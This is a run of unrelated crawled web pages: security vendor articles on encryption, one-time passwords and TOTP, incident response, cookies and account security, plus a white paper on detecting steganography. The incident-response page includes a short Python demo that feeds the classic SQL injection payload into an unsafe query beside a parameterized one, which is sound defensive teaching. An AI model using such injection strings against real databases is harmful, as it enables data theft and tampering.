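nonce = os.urandom(12)                      # must be unique per message
aesgcm = AESGCM(key)

ciphertext = aesgcm.encrypt(nonce, b"controlled unclassified data", b"record-42")
plaintext = aesgcm.decrypt(nonce, ciphertext, b"record-42")
assert plaintext == b"controlled unclassified data"
```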
"As a vetted, DFARS-compliant solutions provider handling 'secret' data, all of our team members underwent and passed background checks. And, our facilities have been inspected. We also are required to use tamper-resistant hardware tokens that are FIPS 140-2 certified to access the systems where we hold DoD information." | <urn:uuid:fd12aceb-6b73-4550-8cad-cc061b0d43d5> | CC-MAIN-2022-40 | https://www.hypr.com/security-encyclopedia/federal-information-processing-standard | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335303.67/warc/CC-MAIN-20220929003121-20220929033121-00002.warc.gz | en | 0.915622 | 272 | 2.90625 | 3 |
A one-time password can be used for many authentication needs including securing private information or creating an alternative to a password reset.
What is a one-time password? An OTP is a random series of letters or numbers that can be used only once to authenticate a user. An OTP is a part of a multi-factor authentication process.
How Do One-Time Passwords Work?
One-Time Passwords were created to address some of the perceived weaknesses of traditional passwords, namely those related to time, storage and usage. On its surface, OTP operates much like a password. But, because it is dynamically and randomly generated, it’s only good for one use, or use at a particular time. In that way, it actually functions much like a token in that the authentication provider assumes that the user possesses a specific account or device.
Passwords as an authentication method have a few drawbacks:
- Security: Passwords, generally speaking, aren’t very secure. While complex passwords are harder to crack and can help when paired with sound password policies and storage, they don’t protect against theft. If a password is stolen, the system will assume that anyone with that password is authentic. This is why phishing is still one of the most prevalent forms of cyberattack. While passwords can be secured, they are far from the most secure option for authentication and identity management.
- User Experience: Passwords are hard to remember, which means that users often reuse passwords, use simple passwords, or use default passwords—all of which open up critical systems to hacks and threats.
- Storage: Passwords are typically stored, hashed, and encrypted in central databases. If that database is breached, it’s only a matter of time before that information is compromised.
Because passwords on their own aren’t generally considered very secure, many organizations use multi-factor authentication that couples passwords with a secondary authentication method. MFA coordinates authentication by combining two types of verification from three different categories:
- Something the User Knows: This includes passwords and PINs in combination with usernames.
- Something the User Has: This includes tokens or one-time passwords.
- Something the User Is: This includes biometrics, like fingerprint or facial scans.
This is where one-time passwords play a role. A one-time password is a password string generated by a server or application either at the point of authentication or on a rolling, time-focused basis.
For example, many MFA solutions will offer the option to send an OTP over SMS or email so that only the user can read it. The assumption is that only the user has access to their email or mobile device. Furthermore, if the user doesn’t log in with the OTP, it will expire.
As another example, the Google Authenticator app can sync with authentication providers across multiple services. The app will refresh OTPs every 30 seconds, separate from any specific login attempt. The user can enter that code when prompted for MFA.
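Under the hood, authenticator apps of this kind typically implement the TOTP algorithm (RFC 6238): an HMAC over a shared secret and the current 30-second time step, truncated to six digits. A compact sketch in Python:

```python
import base64
import hmac
import struct
import time

def totp(shared_secret_b32: str, interval: int = 30, digits: int = 6) -> str:
    """Compute the current time-based one-time password for a base32 secret."""
    key = base64.b32decode(shared_secret_b32, casefold=True)
    counter = int(time.time() // interval)               # current 30-second step
    digest = hmac.new(key, struct.pack(">Q", counter), "sha1").digest()
    offset = digest[-1] & 0x0F                           # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# Server and authenticator app hold the same secret, so both can
# compute (and compare) the same six-digit code for the current window.
print(totp("JBSWY3DPEHPK3PXP"))   # example secret, not a real one
```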
NIST Requirements and One-Time Passwords
One-time passwords are a common form of MFA, so much so that the National Institute of Standards and Technology has defined several requirements for their use in compliant authentication systems.
NIST Special Publication 800-63-3 outlines Authentication Assurance Levels that define the extent to which a user is authenticated in a system. AAL is broken down into three levels:
- AAL1: At this level, users must be authenticated with single- or multi-factor authentication, the latter of which can include single-factor or MFA OTPs. Multi-factor OTPs are used only after the user has provided initial authentication information (a username and password, for example).
- AAL2: AAL2 requires an MFA solution that uses either (a) a physical authenticator and a secret (such as a password) or (b) a physical authenticator and an associated biometric. In this case, the physical authenticator is the OTP-generating device and can include a mobile device with secure OTP functionality.
- AAL3: This level requires using a hardware-based authentication method (a physical token like a USB key), impersonation resistance, and MFA. OTP solutions based on hardware (a special piece of hardware generating OTPs) are acceptable here.
What Are the Challenges and Benefits of One-Time Passwords?
Because one-time passwords are relatively easy to implement, many consumer and business users have come across them in one form or another. Many popular platforms use OTPs as MFA solutions, working with compatible OTP generating apps or simple SMS or email messaging implementations.
As a single- or multi-factor solution, OTPs provide several distinct advantages:
- Security: Because OTPs are dynamically generated, they are much more secure than static passwords. The one-time password is only available for a limited time, under limited circumstances, which means that the window for vulnerability is low.
- Ease of Use: There is no need to remember an OTP, since it is entered at the time of use. As such, OTPs generally eliminate the problems of reused passwords or phishing attacks so long as the mode of generation and delivery remain secure.
- Avoid Replay Attacks: Many threats, including advanced persistent threats, rely on continuing access to a system. OTPs can mitigate certain kinds of threats by closing off channels of access due to expiring authentication credentials.
In terms of challenges related to OTPs, the primary ones are tied to loss of devices or interception of communications. If a user has their phone stolen and it is tied to authentication apps, SMS, or email, the thief can use the device to breach accounts. This isn’t a problem just for OTPs, however.
Additionally, if a user employs hardware-based OTP devices for special cases, the theft of that device can create a security hole.
Finally, the interception of communications like emails or SMS can expose OTPs sent through those channels. This includes cases where a user, a victim of a phishing attack, provides real-time OTP information to a hacker.
1Kosmos BlockID Combines One-Time Passwords with Advanced Authentication
One-time passwords are a useful part of any authentication scheme. They mesh well with other authentication methods and fit into the user experience with simple, device-based approaches.
1Kosmos uses OTPs alongside advanced biometrics, streamlined onboarding, and compliant identity proofing to center user authentication into user devices. This way, your organization can deploy strong, compliant authentication in a way that allows users the ease of access they enjoy with other login services.
The following features are included with 1Kosmos BlockID:
- Identity Proofing: BlockID includes Identity Assurance Level 2 (NIST 800-63A IAL2), detects fraudulent or duplicate identities, and establishes or reestablishes credential verification.
- Identity-Based Authentication Orchestration: We push biometrics and authentication into a new “who you are” paradigm. BlockID uses biometrics to identify individuals, not devices, through identity credential triangulation and validation.
- Integration with Secure MFA: BlockID readily integrates with a standard-based API to operating systems, applications, and MFA infrastructure at AAL2. BlockID is also FIDO2 certified, protecting against attacks that attempt to circumvent multi-factor authentication.
- Cloud-Native Architecture: Flexible and scalable cloud architecture makes it simple to build applications using our standard API, including private blockchains.
- Privacy by Design: 1Kosmos protects personally identifiable information in a private blockchain and encrypts digital identities in secure enclaves only accessible through advanced biometric verification.
To learn more about BlockID MFA and security, sign up for the 1Kosmos newsletter. Or, to see how 1Kosmos integrates several advanced security features into a single authentication platform, check out our LiveID data sheet. | <urn:uuid:605d4654-4591-4cfd-b0ee-4d64ba595a48> | CC-MAIN-2022-40 | https://www.1kosmos.com/authentication/one-time-password/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335448.34/warc/CC-MAIN-20220930082656-20220930112656-00002.warc.gz | en | 0.912755 | 1,673 | 3.078125 | 3 |
A cyber attack can be fatal for any business. It is not just the big corporations that should be concerned. In fact, it is actually small and medium sized businesses that are the most likely to face an attack and the consequences are dire for these entities.
Up to 60 percent of small to medium sized businesses are forced to shut down permanently after a data breach. That is why every organization should have a response plan in place in case of a breach or attack.
There is no doubt that your company should be vigilantly trying to protect against would be attacks but even if you are doing everything you can to prevent an attack, you still need to be prepared if your network is breached. Just one misstep by an employee could expose your entire network.
On average, 56 percent of companies that are breached do not discover the breach for months and companies that suffer an attack, such as a ransomware attack, will on average be down for at least two weeks.
Incident response planning should start with a cyber risk and resilience review. Knowing where you are must vulnerable makes it easier to identify a breach when it happens. You then want to create a playbook of protocols and procedures for quickly addressing the fallout of a breach. This can include automatic data backups, automated responses that purge infected systems, quarantine parts of your network that may be compromised and restoring your network to a safe state.
There are countless ways that a network can be attacked. You may not need to know every possible attack vector, you should leave that to your vCISO, but you should be aware of the most popular and effective attack types.
- Phishing – These types of attacks involve sending a fraudulent communication that tricks the receiver into giving up sensitive material. Often these come in the form of an email that asks for protected information such as passwords, redirects the person to a malware site, or has the receiver download malware to their computer. While these attacks are relatively unsophisticated, they work surprisingly well and often.
- Distributed Denial of Service Attack (DDoS) – Hackers use DDoS attacks to shut down networks. The way these attacks work is through use of a bot network of infected computers that overloads a network with a flood of fake requests. This makes it so that legitimate requests to the server cannot get through.
- Malware – Malicious software can get onto your computer systems through bad links or downloading infected attachments. This software is often used to steal sensitive data.
- SQL Injection – Structured Query Language (SQL) has widespread use for maintaining databases. SQL injection involves an attacker inserting code into an SQL server that makes it reveal information contained in the database, destroy data, or spoof an identity.
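The standard defense against that last vector is never to splice user input directly into a query string; parameterized queries let the database driver treat input strictly as data. A minimal illustration with Python’s built-in sqlite3 module:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'admin')")

user_input = "' OR '1'='1"   # a classic injection payload

# Vulnerable: the payload becomes part of the SQL and matches every row.
vulnerable = conn.execute(
    "SELECT * FROM users WHERE name = '" + user_input + "'"
).fetchall()

# Safe: the placeholder keeps the payload as a literal string, so nothing matches.
safe = conn.execute("SELECT * FROM users WHERE name = ?", (user_input,)).fetchall()

print(vulnerable)   # [('alice', 'admin')] - injection succeeded
print(safe)         # [] - injection neutralized
```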
If we’ve learned anything from crime shows on television, it’s that there are always traces left behind after a crime has been committed. In the digital landscape, this is true as well. A cyber criminal will leave behind some traces of how they got in and out. Digital forensics is a matter of looking through the electronic data available and making an interpretation based on the evidence of what may have occurred.
The digital forensics process generally involves imaging of breached data, analysis of the data and a report of the findings. That process can include recovering deleted files and extracting registry information to see when and who accessed the data.
For instance, imagine your company is breached and data is stolen during the weekend. Where would you start? The process could be as simple as reviewing your registry data to see who accessed your network before the breach occurred. You may then find that the login information for an employee were used to access your server remotely. An analysis of that employees whereabouts at the time of the breach and his email history may reveal he was the victim of a phishing attack and his credentials were stolen. Digital forensics is just about following the clues but you have to know what to look for.
The Alliant Cybersecurity Advantage
The worst thing you can do after you suffer a cyber attack is to not have a plan. Alliant Cybersecurity and our experts will not only analyze your network to identify vulnerabilities and help you defend against attacks but our response planning will make sure you are prepared if the worst happens.
Reach out to us today for a complimentary review. | <urn:uuid:567b4e0d-4db3-4326-a79a-8ccd8aec66af> | CC-MAIN-2022-40 | https://www.alliantcybersecurity.com/our-services/respond/incident-response/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335448.34/warc/CC-MAIN-20220930082656-20220930112656-00002.warc.gz | en | 0.958283 | 886 | 2.65625 | 3 |
Of all the changes coming to digital marketing, none may be more impactful and controversial than Google’s phase-out of third-party cookies on Chrome browsers (Google’s most recent announcement). Advertisers have been using third-party cookies to collect data on user behavior and interests online for many years. This process has allowed advertisers to home in on target-rich audiences across multiple advertising platforms, producing one of the last decade’s most successful digital marketing strategies.
But with data privacy becoming increasingly important to users online, this marketing practice, among others, is no longer looked at favorably. Google has acknowledged that some data practices don’t match up to user expectations for privacy, and it is in the name of privacy that it launched the Privacy Sandbox initiative, under which Chrome will discontinue its support of third-party cookies.
Let’s dig in.
What are Tracking Cookies?
Tracking cookies are small data files that websites store on your computer for future reference and retrieval. They’re typically used to manage user sessions, deliver personalized content, and, as their name suggests, for tracking. There are many types of cookies, but for our discussion, we’ll focus on first- and third-party cookies:
First-party cookies are generated by website owners and used exclusively on the websites that generate them. They are generally used to enhance your website’s user experience by storing user preferences (such as preferred language, login information, or chat sessions). Marketers also use first-party cookies to track website visitor demographics and behavior, usually in basic analytics (e.g., session, location, device, shopping cart items, etc.). The important things to remember are that third parties don’t use this data for advertising, and first-party cookies don’t provide site owners with insights beyond what they collect directly on those websites.
Third-party cookies are generated by parties other than the site owner – e.g., ad networks. Like first-party cookies, they collect tracking data from web visitors. That data is used for marketing purposes (e.g., serving content or ads). Third-party cookies enable advertisers to target specific audiences on third-party platforms or websites based on user behavior and preferences.
Here’s an example of how a third-party cookie might be used:
A web user lands on Awesome Company’s product page. Later, when visiting other websites (e.g., Facebook, a third-party blog, etc.), the user sees an advertisement for the product they saw on Awesome Company’s website. (This ad practice is called “retargeting.”)
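Under the hood, that retargeting experience rests on how the cookies themselves are set. As a hedged illustration (the domains and cookie names below are invented, the article itself contains no code, and the samesite attribute requires Python 3.8 or newer), the sketch shows roughly what a first-party and a third-party Set-Cookie header look like; the SameSite=None plus Secure combination on the second is what lets it travel along on cross-site requests, and it is that pattern the phase-out targets.

```python
from http.cookies import SimpleCookie

# First-party cookie: set by the site the user is actually visiting.
first_party = SimpleCookie()
first_party["session_id"] = "abc123"
first_party["session_id"]["domain"] = "awesome-company.example"
first_party["session_id"]["path"] = "/"
first_party["session_id"]["samesite"] = "Lax"   # not sent on most cross-site requests
print(first_party["session_id"].OutputString())

# Third-party cookie: set by an ad network embedded on many different sites.
third_party = SimpleCookie()
third_party["ad_id"] = "user-784-xyz"
third_party["ad_id"]["domain"] = "ads.example-network.com"
third_party["ad_id"]["samesite"] = "None"       # allowed to ride on cross-site requests...
third_party["ad_id"]["secure"] = True           # ...but only over HTTPS
print(third_party["ad_id"].OutputString())
```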
Why a Third-Party Cookie Phase-Out was Inevitable
Privacy is a growing concern for online users and authorities in the United States and around the world. According to PEW Research Center, 79% of Americans show “concern over data usage,” and 59% say they have a “lack of understanding about data use.” These realities have prompted companies like Google to become more privacy-focused in their online products and services. Google isn’t the first. In the most visible example, Apple’s blocking of third-party cookies by default has been at the heart of Facebook parent company Meta’s recent ad woes. Firefox automatically disables cross-site tracking cookies and gives you features to manage your level of privacy while navigating to different websites.
How Marketers are Preparing for Third-Party Cookie Phase-Out
The biggest impact of this change will be felt in retargeting. That means B2C activities will take the brunt of the disruption, but plenty of B2B players will need to adjust as well. There’s still a lot to work with:
- First-party cookies are still on the table: While third-party cookies are on the way out, first-party cookies still collect tons of valuable data to bolster user experience and help advertisers understand their audiences and make educated decisions in their marketing campaigns.
- You can encourage users to share data: Email is still the most significant medium for marketers when it comes to first-party data. Great content and incentives on your website to leverage newsletter signups and website subscriptions remain impactful digital marketing strategies.
- You can leverage your data on advertising platforms: Advertisers can still use their data on advertising platforms like Google Ads and Facebook. For instance, you can still use customer lists to create custom audiences on Facebook or use Google’s Customer Match feature for enhanced conversion optimization.
- Google is still going to track people’s behavior online: While Google is opting out of tracking individual people, the company is heavily invested in tracking groups of people, such as with the tracking system FLoC (Federated Learning of Cohorts).
What Should You Do?
While much attention has been given to this change, it’s essential to keep it in perspective. All your marketing channels – including PPC and other online advertising – remain wide open. You’ll just need to focus more heavily on best practices for generating brand awareness, delivering solid user experiences, and building proprietary lists and audiences. We’ve long known that content (strategy, relevance and substance) will separate marketing winners and losers over the long haul. That trend was accelerated when the pandemic shut down live events. The loss of third-party cookies is just another nudge in that direction. | <urn:uuid:7cf796bb-b22d-40eb-bb18-499565e42454> | CC-MAIN-2022-40 | https://buzztheory.com/googles-phase-out-of-third-party-cookies-explained/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337371.9/warc/CC-MAIN-20221003003804-20221003033804-00002.warc.gz | en | 0.919934 | 1,144 | 2.515625 | 3 |
Use non-obvious answers to security questions
When creating online accounts have you ever been asked for answers to questions such as:
- What was your mum's maiden name?
- What was the first school you attended?
- What is your favourite colour?
These questions are often used to help prove your identity if you forget your password. Unfortunately, though, many of the answers we're encouraged to give are trivial to guess or research - gifting hackers an easy way to break into your account.
Consider how few answers there are to "What is your favourite colour?". Even if a first guess of "red" is wrong it probably wouldn't take too many tries to get it right. And does your public Facebook or LinkedIn profile answer the question "Which university did you attend?".
Strong passwords are worthless if hackers can just use this easy backdoor route.
The email account of the US vice-presidential candidate Sarah Palin was hacked this way in 2008, and nude photos of Scarlett Johansson were accessed by this method too.
Instead, to protect yourself just follow this simple rule:
Never provide a direct answer to the question.
If any website asks you these types of questions you could either provide a completely irrelevant answer or, if that's not easy to remember, answer the question but add something random after it, such as "bathtub". This extra word can be the same for each account to help you remember it.
Facebook fun? Or a scam?
Do you ever see those Facebook posts that get shared thousands of times -
- "What's your pornstar name? Type the name of your first pet and your favourite colour now!", or
- "Discover your Star Wars character name! Enter the name of your favourite teacher and the name of the street you grew up on."
A bit of harmless fun? Maybe - or maybe not.
Think the questions look familiar? That's because they're often the very same ones that websites use as security questions to reset your password - and you might just be giving the answers away for all to see!
Even fun questionnaires that are just between friends can give information away to fraudsters. When was the last time you reviewed your Facebook privacy settings?
Be careful with what you post on social media - and who can see your posts. Those fun viral posts may not always be quite so fun & innocent after all...
Many websites now use stronger password reset processes, such as emailing a password reset link or texting a security code to your phone, but there are still many sites where a simple question is all that's stopping an attacker from accessing your account.
Make sure you protect yourself from this type of attack!
Your mobile phone
Do you read and send email from your phone? And do you access Facebook, Twitter, and other accounts from it too?
Whilst it's convenient to log straight into these apps without needing a password, if your phone is ever stolen then the thief will also be able to access these too. To help avoid this it's a good idea to do the following:
Add a pin
The best defence is always to require a PIN when unlocking your phone (or fingerprint scanning or facial recognition instead - these are equally good). You can often make this less intrusive by only asking for your PIN if your phone has been left locked for 5 minutes or more.
Enable the "Find my phone" feature
Many modern phones come with a "Find My Phone" feature to help locate it if it's ever lost (for as long as it has power & a phone signal).
This feature also often allows you to remotely delete all data, preventing anyone from accessing whatever you have on your phone.
If you've lost your phone
If you ever lose your phone then you should get to a computer and change the passwords for your different accounts straight away, just in case a thief does manage to access your phone. For more details see our Help! I've lost my phone page.
We have more in-depth advice to looking after your phone on our page here.
Avoid getting locked out
Whilst you're reviewing your security settings, you might also want to check any settings for proving your identity should you ever get locked out.
Most of us forget our passwords every now and then. Normally we can easily regain access by following a simple password reset process, but what if we forget the answers to the security question, or if we don’t have access to our email to get the password reset link?
A little forward planning can help here - see if your favourite websites offer these options:
1) Set up extra contact info:
- Adding contact details, such as a phone number or extra email address, can help you prove your identity if you ever find yourself locked out.
- Remember to review these regularly in case your details change.
2) Trusted Friends:
- Facebook also offers a "Trusted Contacts" feature, where you nominate 3 (or more) friends to prove your identity and help you regain access.
- Don’t worry, Facebook have checks in place to stop cheeky friends from abusing this & getting access to your account without your permission!
3) Recovery codes:
- Recovery codes are effectively a secondary password that you keep securely locked away (in the care of your solicitor for example) and use to reset your main password.
- You must make sure you look after this code and treat it at least as securely as you would any other password.
Take a look in the "Account" or "Security Settings" sections of your favourite websites – see what they recommend and if there’s anything you can set up today.
You might also be interested in what happens to our online accounts when we die. A little forward planning of your digital legacy now can save our loved ones a lot of hassle later on.
How else can I keep my accounts secure?
A good antivirus package on your PC can help prevent some viruses from silently stealing the passwords to our online accounts. You should also keep the software of your computer up to date too, and never open any email attachments that you're not expecting.
BeCyberSafe.com have a lot of practical information about how to protect your computer from viruses - it's definitely worth a read.
Enabling activity notifications
Many websites have the ability to send you an alert if they ever detect any suspicious activity, such as if someone tries to log into your account from a new device or tries to change your password.
Knowing that someone is trying to access your account will serve as an immediate call to check all your security settings & to perhaps change your password. Search the help section for "activity notifications" on your favourite websites for how to enable this. | <urn:uuid:0fefe7ae-6e66-46b0-ad4d-aabd13bd3cad> | CC-MAIN-2022-40 | https://www.becybersafe.com/passwords/account-security.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337490.6/warc/CC-MAIN-20221004085909-20221004115909-00002.warc.gz | en | 0.948837 | 1,384 | 2.75 | 3 |
First published August 2005
by James E. Wingate, CISSP-ISSEP, CISM, IAM
Director, Steganography Analysis & Research Center
Chad W. Davis
Computer Security Engineer
Rapidly evolving computer and networking technology, coupled with a dramatic expansion in communications and information exchange capability within government organizations, public and private corporations, and even our own homes, has made our world smaller. As a society, we are substantially more invested in information technologies than ever before. Use of the Internet and multimedia technologies for communication has become commonplace and an integral part of both business and social activity. This has changed how societies across the globe operate.
The rapid evolution of the Internet has also been somewhat of a “double-edged sword.” Not only has it provided a medium for exchanging vast amounts of information and knowledge for the benefit of mankind, it has also provided a new medium for conducting activities detrimental to mankind. No longer confined to the bounds of physical space, criminals, including terrorists, have discovered a virtual world where they can take advantage of the vast expanse of cyber space to conceal their activities from the prying eyes of law enforcement and the intelligence community. In the pre-Internet era, criminals often operated under the cloak of darkness. Now they operate 24×7 under the cloak of cyber space, with little concern for being detected, arrested, prosecuted, and convicted, because by and large much criminal activity goes unreported. Even when it is reported, law enforcement is already so overwhelmed with child exploitation (CP) investigations that it doesn’t have the time or resources to investigate other cyber crimes. This fact is not lost on those who would use the Internet for illegal or otherwise nefarious purposes.
To make matters worse, criminals are adapting to evolving law enforcement technologies in the field of computer forensics by finding new ways to conceal their criminal activities. Law enforcement forensic examiners are beginning to discover data hiding applications on seized media that have been used to evade detection by popular computer forensic tools by hiding a digital file inside of another digital file. This technique is called digital steganography.
Steganography, literally meaning “covered writing,” is a means of covert communication that encompasses a variety of techniques used to embed data within a cover medium in such a manner that the very existence of the embedded information is undetectable.
Hundreds of steganography applications are readily available on the Internet, and most of those are available as freeware or shareware, for use by criminals and terrorists. Computer security, law enforcement, and intelligence professionals need the capability to both detect the use of digital steganography applications to hide information and then extract the hidden information. Accordingly, there is much current interest in steganalysis, or the detection and extraction of information hidden with digital steganography applications.
There are two major schools of thought for conducting steganalysis: one of which involves an approach known as “blind detection” and the other is a more analytical approach. This document will describe both techniques and how they can be employed together to conduct steganalysis.
The Blind Detection Approach to Steganalysis
The blind detection approach to steganalysis has been around for a number of years. Blind detection attempts to determine if a message may be hidden in a file without any prior knowledge of the specific steganography application used to hide the information. Several techniques may be employed to inspect suspect files including various visual, structural, and statistical methods. Visual analysis methods attempt to detect the presence of steganography through visual inspection, either with the naked eye or with the assistance of automated processes. Visual inspection with the naked eye can succeed when steganography is inserted in relatively smooth areas with nearly equal pixel values. Automated computer processes can, for example, decompose an image into its individual bit-planes. A bit-plane consists of a single bit of memory for each pixel in an image, and is a typical storage place for information hidden by steganography applications. Any unusual appearance in the display of the least significant bit-plane would be expected to indicate the existence of steganography.
Structural analysis methods attempt to reveal alterations in the format of the data file. For example, a steganography application may append hidden information past an image’s end-of-file marker. An image that has been modified using this appending technique is interpreted by the operating system just as if it were the original carrier file. The two files are visually and digitally identical, because the image’s data bits have not been altered. The hidden information that is embedded past the end-of-file marker is simply ignored by the operating system. Several automated methods for conducting structural analysis have been developed in addition to the manual process of investigating images with a hex editor.
Statistical analysis methods attempt to detect tiny alterations in a file’s statistical behavior caused by steganographic embedding. Statistical analysis of files can be difficult and time consuming, since there are a variety of approaches to embedding—each modifying the carrier file in a different way. Therefore, unified techniques for detecting steganography using this method are difficult to find. Determining statistics such as means, variances, and chi-square tests can measure the amount of redundant information and/or deviation from the expected file characteristic. Current research in blind detection steganalysis is focused on these statistical methods.
Complications of Blind Detection
In practice, even if the blind detection technique detects anomalies in suspect files, it is not very likely that the hidden information can successfully be extracted. The suspect file may have characteristics similar to an anomaly that will trigger a false positive result. It is also important to keep in mind that even if it is possible to extract the hidden information, it may have been encrypted prior to being hidden in the carrier file. In that case, the hidden information extracted from the carrier file, if that is even possible, will be in the form of cipher text which may not be decipherable if a very strong encryption algorithm was used.
The following four complications are possible when implementing blind detection techniques for steganalysis:
1. The suspect file may or may not have any information hidden in it in the first place.
2. The hidden message may have been encrypted before being hidden in the carrier file.
3. Some suspect files may have had noise or irrelevant data encoded in them which reduces the stealth aspect (i.e., makes it easier to detect use of steganography) but makes analysis very time-consuming.
4. Unless the hidden information can be found, completely recovered, and decrypted (if encrypted), it is often not possible to be sure whether the suspect carrier file contained a hidden message in the first place—all you end up with is a probability that the suspect carrier file may have something hidden within it.
The Analytical Approach to Steganalysis
The analytical approach to steganalysis has been developed within the Steganography Analysis and Research Center (SARC) as a product of extensive research of steganography applications and the techniques they employ to embed hidden information within files.
The premise of this approach is to first determine if any residual file and/or Windows Registry® artifacts from a particular steganography application exist on the suspect media.
– If residual artifacts exist, then the application was probably installed
– If the application was installed, then it was probably used
– If the application was used, then it was used to hide something
And that is exactly what the computer forensics examiner must try to determine. What information was hidden? That may be the key to the investigation that resulted in the computer seizure in the first place.
The analytical approach attempts to determine if there is any evidence that a steganography application ever existed on the suspect media. Searching for files and registry entries that have been identified by the SARC as belonging to a steganography application will identify these residual artifacts.
The goal is to determine which steganography application was used. Determining the application used will shed light on the embedding technique employed by the application and the file types used by the application as carrier files. Armed with that knowledge, the examiner can then focus their efforts on detailed analysis of suspect carrier files and attempt to extract information that may have been hidden in those files.
Process for Analytical Steganalysis
The analytical approach to steganalysis is intended to be an extension of traditional digital forensics methods. For example, traditional methods should be employed to recover all files that may have been deleted prior to beginning the steganalysis aspect of the examination.
Determining Residual File Artifacts
To determine if residual file artifacts of steganography applications exist on the suspect media, the SARC has developed the Steganography Application Fingerprint Database (SAFDB). The SAFDB contains hash values for nearly 15,000 file profiles associated with 230 steganography, watermarking, and other data-hiding applications. The file profiles contain identifying information such as filename, associated application name, and four unique hash values: CRC-32, MD5, SHA-1, and SHA-256. These hash values may be used to determine the presence of a steganography application or artifact of a steganography application on the media being examined.
For a limited time, the SAFDB is available at no charge to authorized law enforcement and intelligence community examiners on the SARC website at www.sarc-wv.com. The database is available in formats compatible with most popular forensic tools: EnCase, FTK, HashKeeper, ILook, and ProDiscover. For additional information on SAFDB, please contact the SARC to request the free White Paper on “The Steganography Application Fingerprint Database.”
The first step in the analytical approach is to hash all files on the suspect media. Next, the hash values are compared with the hash values in SAFDB. A match represents a file artifact that may be associated with one or more steganography applications. Each file profile within the SAFDB identifies which steganography application that artifact belongs to.
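A minimal sketch of this hash-and-compare step is shown below (Python, standard library only). The SAFDB lookup is mocked as an in-memory dictionary with a made-up entry, since the real database formats and field layout are not reproduced here; a real examination would also run against a forensic copy of the media, never the original.

```python
import hashlib
from pathlib import Path

# Hypothetical stand-in for SAFDB: SHA-256 digest -> associated application.
KNOWN_ARTIFACTS = {
    "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08": "ExampleStego 1.0",
}

def hash_file(path, algorithm="sha256", chunk_size=65536):
    """Hash a file in chunks so large evidence files do not exhaust memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

def scan_media(root):
    """Walk the mounted image and report files whose hash matches a known artifact."""
    for path in Path(root).rglob("*"):
        if path.is_file():
            digest = hash_file(path)
            if digest in KNOWN_ARTIFACTS:
                print(f"{path}: artifact of {KNOWN_ARTIFACTS[digest]}")

# scan_media("/mnt/suspect_image")
```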
Determining Residual Registry Artifacts
In addition to the hash values of files associated with steganography applications, the SAFDB also contains a set of registry keys and values known to be created or modified as a result of installing a steganography application. This aspect of the analytical approach is not unlike searching for latent fingerprints at a crime scene. Some criminals go to great lengths to cover their tracks by wearing gloves and/or cleaning up a crime scene. Likewise, some cyber criminals will go to great lengths to cover their tracks. After using a steganography application, they may uninstall the application and then delete obvious folders and files associated with the application that weren’t removed by the uninstall operation.
The registry keys and values can be compared to the registry from the suspect computer to determine if a steganography application currently exists, or did exist at one time, on the system. A positive match could lead the investigator to confirm with a high degree of confidence that a particular steganography application has existed on a suspect system.
It is entirely conceivable that a single registry key or value could be the sole fingerprint left behind that could become the key to finding and extracting information hidden with a steganography application deleted from the system after it was used.
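To illustrate the registry side, here is a hedged sketch using Python's standard winreg module on a live Windows system. The key paths are hypothetical examples rather than actual SAFDB entries, and a real examination would normally parse registry hive files extracted from the forensic image rather than query a running machine.

```python
import winreg

# Hypothetical keys that a steganography application might create on installation.
SUSPECT_KEYS = [
    (winreg.HKEY_CURRENT_USER, r"Software\ExampleStego"),
    (winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\ExampleStego\Settings"),
]

def find_registry_artifacts():
    hits = []
    for hive, subkey in SUSPECT_KEYS:
        try:
            with winreg.OpenKey(hive, subkey):
                hits.append(subkey)      # key exists: residual artifact found
        except FileNotFoundError:
            pass                         # key absent: nothing to report
    return hits

print(find_registry_artifacts())
```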
Conducting Analytical Steganalysis
After determining which steganography application(s) may have been used, carrier file types that can be manipulated by those applications should be identified. To determine the potential carrier file types for a steganography application, the examiner should download and experiment with that application. The SARC maintains a physical repository of each steganography application that exists in the SAFDB and may be contacted for assistance if the examiner cannot locate a particular steganography application on the Internet. Copies of commercially licensed versions of steganography applications cannot be provided.
Next, a focused search should be conducted on the suspect media for carrier file types that are manipulated by the particular steganography application. Finally, the suspect carrier files can be subjected to further analysis based on the specific steganographic techniques that can be used on them.
After determining which steganography technique was employed by the application detected on the suspect media, efforts to extract information hidden with that application can begin. Again, if strong encryption was used prior to hiding the information in the carrier file, then complex cryptanalysis may be necessary to translate the extracted cipher text back into plain text.
Some steganography applications leave behind signatures, specific byte patterns that always appear in a file after hidden information has been embedded. Signature-based steganalysis can be very time consuming because the signature for a specific steganography application must first be identified from a large sample of files that have been embedded using it. In addition, automated processes must be employed to search every potential carrier file for that particular signature.
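A simple version of that signature search is sketched below in Python; the byte pattern is made up for illustration, since real application signatures are exactly what proprietary signature databases catalogue.

```python
# Hypothetical signature a particular steganography application is assumed to
# leave near the end of every file it embeds data into.
SIGNATURE = bytes.fromhex("DEADBEEF0001")

def has_signature(path, tail_bytes=4096):
    """Check only the last few kilobytes, where append-style tools typically write."""
    with open(path, "rb") as f:
        f.seek(0, 2)                     # jump to the end to learn the file size
        size = f.tell()
        f.seek(max(0, size - tail_bytes))
        return SIGNATURE in f.read()
```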
An automated artifact detection tool, StegAlyzerAS (Steganography Analyzer Artifact Scanner), has been developed to detect file and registry artifact matches with SAFDB.
An automated signature-based detection tool that uses a proprietary steganography application signature database, StegAlyzerSS (Steganography Analyzer Signature Scanner), has also been developed.
These products were designed and developed to alleviate the very complex and time consuming efforts that a computer forensics examiner must endure during an investigation involving steganography.
In addition to the StegAlyzer products, computer forensic examiners can also contact the SARC for technical assistance when steganography is detected during an examination of suspect media.
